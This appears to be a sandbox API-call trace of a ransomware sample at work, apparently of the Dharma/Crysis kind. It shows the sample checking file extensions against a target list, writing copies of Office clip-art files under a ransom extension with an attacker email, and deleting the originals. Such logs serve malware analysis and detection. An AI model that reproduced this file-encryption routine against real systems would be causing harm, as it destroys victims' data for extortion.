	[0169.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153307.wmf")) returned 1
	[0169.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.470] lstrlenW (lpString=".doc") returned 4
	[0169.471] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString=".docx") returned 5
	[0169.471] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.471] lstrlenW (lpString=".pdf") returned 4
	[0169.471] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString=".xls") returned 4
	[0169.471] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.471] lstrlenW (lpString=".xlsx") returned 5
	[0169.471] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.471] lstrlenW (lpString=".ppt") returned 4
	[0169.471] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.471] lstrlenW (lpString=".zip") returned 4
	[0169.471] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.471] lstrlenW (lpString=".rar") returned 4
	[0169.471] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString=".bz2") returned 4
	[0169.471] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString=".7z") returned 3
	[0169.471] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.471] lstrlenW (lpString=".dbf") returned 4
	[0169.471] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.471] lstrlenW (lpString=".1cd") returned 4
	[0169.471] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.471] lstrlenW (lpString=".jpg") returned 4
	[0169.471] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.471] lstrlenW (lpString=".doc") returned 4
	[0169.471] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.471] lstrlenW (lpString=".docx") returned 5
	[0169.472] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.472] lstrlenW (lpString=".pdf") returned 4
	[0169.472] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.472] lstrlenW (lpString=".xls") returned 4
	[0169.472] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.472] lstrlenW (lpString=".xlsx") returned 5
	[0169.472] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.472] lstrlenW (lpString=".ppt") returned 4
	[0169.472] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.472] lstrlenW (lpString=".zip") returned 4
	[0169.472] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.472] lstrlenW (lpString=".rar") returned 4
	[0169.472] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.472] lstrlenW (lpString=".bz2") returned 4
	[0169.472] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.472] lstrlenW (lpString=".7z") returned 3
	[0169.472] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.472] lstrlenW (lpString=".dbf") returned 4
	[0169.472] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.472] lstrlenW (lpString=".1cd") returned 4
	[0169.472] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153307.WMF") returned 63
	[0169.472] lstrlenW (lpString=".jpg") returned 4
	[0169.472] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.472] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.472] lstrlenW (lpString="J0153313.WMF") returned 12
	[0169.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.473] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=16952) returned 1
	[0169.473] CloseHandle (hObject=0x17c) returned 1
	[0169.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf")) returned 0x20
	[0169.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.474] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.474] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.474] GetLastError () returned 0x0
	[0169.474] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4238, lpOverlapped=0x0) returned 1
	[0169.630] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4240, lpOverlapped=0x0) returned 1
	[0169.631] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.631] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.631] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.631] CloseHandle (hObject=0x1d8) returned 1
	[0169.631] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.631] SetEndOfFile (hFile=0x17c) returned 1
	[0169.635] CloseHandle (hObject=0x17c) returned 1
	[0169.635] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153313.wmf")) returned 1
	[0169.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.638] lstrlenW (lpString=".doc") returned 4
	[0169.638] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.638] lstrlenW (lpString=".docx") returned 5
	[0169.638] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0169.638] lstrlenW (lpString=".pdf") returned 4
	[0169.638] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.638] lstrlenW (lpString=".xls") returned 4
	[0169.638] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.638] lstrlenW (lpString=".xlsx") returned 5
	[0169.638] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0169.638] lstrlenW (lpString=".ppt") returned 4
	[0169.638] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.638] lstrlenW (lpString=".zip") returned 4
	[0169.638] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.638] lstrlenW (lpString=".rar") returned 4
	[0169.638] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.638] lstrlenW (lpString=".bz2") returned 4
	[0169.639] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString=".7z") returned 3
	[0169.639] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.639] lstrlenW (lpString=".dbf") returned 4
	[0169.639] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.639] lstrlenW (lpString=".1cd") returned 4
	[0169.639] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.639] lstrlenW (lpString=".jpg") returned 4
	[0169.639] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.639] lstrlenW (lpString=".doc") returned 4
	[0169.639] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString=".docx") returned 5
	[0169.639] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0169.639] lstrlenW (lpString=".pdf") returned 4
	[0169.639] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString=".xls") returned 4
	[0169.639] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.639] lstrlenW (lpString=".xlsx") returned 5
	[0169.639] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0169.639] lstrlenW (lpString=".ppt") returned 4
	[0169.639] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.639] lstrlenW (lpString=".zip") returned 4
	[0169.639] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.639] lstrlenW (lpString=".rar") returned 4
	[0169.639] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString=".bz2") returned 4
	[0169.639] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.639] lstrlenW (lpString=".7z") returned 3
	[0169.639] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.640] lstrlenW (lpString=".dbf") returned 4
	[0169.640] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.640] lstrlenW (lpString=".1cd") returned 4
	[0169.640] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153313.WMF") returned 63
	[0169.640] lstrlenW (lpString=".jpg") returned 4
	[0169.640] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.640] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.640] lstrlenW (lpString="J0157191.WMF") returned 12
	[0169.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.641] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=17912) returned 1
	[0169.641] CloseHandle (hObject=0x17c) returned 1
	[0169.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf")) returned 0x20
	[0169.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.641] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.641] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.641] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.642] GetLastError () returned 0x0
	[0169.642] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x45f8, lpOverlapped=0x0) returned 1
	[0169.654] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4600, lpOverlapped=0x0) returned 1
	[0169.655] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.656] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.656] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.656] CloseHandle (hObject=0x1d8) returned 1
	[0169.656] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.656] SetEndOfFile (hFile=0x17c) returned 1
	[0169.658] CloseHandle (hObject=0x17c) returned 1
	[0169.658] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.658] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157191.wmf")) returned 1
	[0169.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.659] lstrlenW (lpString=".doc") returned 4
	[0169.659] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.659] lstrlenW (lpString=".docx") returned 5
	[0169.659] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.659] lstrlenW (lpString=".pdf") returned 4
	[0169.659] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.659] lstrlenW (lpString=".xls") returned 4
	[0169.659] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.659] lstrlenW (lpString=".xlsx") returned 5
	[0169.659] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.659] lstrlenW (lpString=".ppt") returned 4
	[0169.659] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.659] lstrlenW (lpString=".zip") returned 4
	[0169.659] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.659] lstrlenW (lpString=".rar") returned 4
	[0169.659] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString=".bz2") returned 4
	[0169.660] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString=".7z") returned 3
	[0169.660] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.660] lstrlenW (lpString=".dbf") returned 4
	[0169.660] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.660] lstrlenW (lpString=".1cd") returned 4
	[0169.660] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.660] lstrlenW (lpString=".jpg") returned 4
	[0169.660] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.660] lstrlenW (lpString=".doc") returned 4
	[0169.660] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString=".docx") returned 5
	[0169.660] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.660] lstrlenW (lpString=".pdf") returned 4
	[0169.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString=".xls") returned 4
	[0169.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.660] lstrlenW (lpString=".xlsx") returned 5
	[0169.660] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.660] lstrlenW (lpString=".ppt") returned 4
	[0169.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.660] lstrlenW (lpString=".zip") returned 4
	[0169.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.660] lstrlenW (lpString=".rar") returned 4
	[0169.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString=".bz2") returned 4
	[0169.660] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.660] lstrlenW (lpString=".7z") returned 3
	[0169.661] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.661] lstrlenW (lpString=".dbf") returned 4
	[0169.661] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.661] lstrlenW (lpString=".1cd") returned 4
	[0169.661] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157191.WMF") returned 63
	[0169.661] lstrlenW (lpString=".jpg") returned 4
	[0169.661] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.661] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.661] lstrlenW (lpString="J0158071.WMF") returned 12
	[0169.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.661] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=18652) returned 1
	[0169.662] CloseHandle (hObject=0x17c) returned 1
	[0169.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf")) returned 0x20
	[0169.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.662] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.662] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0169.663] GetLastError () returned 0x0
	[0169.663] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x48dc, lpOverlapped=0x0) returned 1
	[0169.680] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x48e0, lpOverlapped=0x0) returned 1
	[0169.682] ReadFile (in: hFile=0x17c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.682] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.682] SetEndOfFile (hFile=0x1d8) returned 1
	[0169.682] CloseHandle (hObject=0x1d8) returned 1
	[0169.682] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.683] SetEndOfFile (hFile=0x17c) returned 1
	[0169.685] CloseHandle (hObject=0x17c) returned 1
	[0169.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.686] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0158071.wmf")) returned 1
	[0169.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0158071.WMF") returned 63
